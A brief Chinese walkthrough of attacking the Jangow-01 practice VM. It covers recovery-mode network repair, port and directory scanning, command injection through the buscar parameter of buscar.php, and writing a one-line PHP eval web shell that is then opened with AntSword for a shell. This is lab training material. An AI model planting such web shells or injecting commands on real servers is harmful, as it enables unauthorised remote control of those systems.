jangow-01-1.0.1靶机
靶机 ip:192.168.152.155
把靶机的网络模式调成和攻击机kali一样的网络模式,我的kali是NAT模式,
在系统启动时(长按shift键)直到显示以下界面 ,我们选第二个,按回车。
继续选择第二个,这次按 e 进入编辑页面
接下来, 删除"recovery nomodeset"并在末尾添加"quiet splash rw init=/bin/bash"
按 F10 或者 ctrl+x 启动
我们 cd 到 etc 下的 network 目录中修改 interfaces 文件(将网卡信息设置为 ens33),重启靶机即可生效。)
cd etc
cd network
vim interfaces
我们使用 nmap -sS 扫描端口
发现他开启了 80 和 21 端口
我们访问一下 80 端口
发现了一个 site 目录,点击进去是一个页面
我们继续使用 dirb 查一下他有什么文件
我们挨个访问一下,assets 是一个图片目录
css 是一个文件目录
访问到 buscar.php 中发现url 框中有参数 buscar=
我们输入一个 id 参数
页面有变化
这时我们就可以写入一个一句话木马
echo '<?php eval($_POST["cmd"]);' > 123.php
我们去访问一下 123.php
访问成功,使用蚁剑连接
获得 shell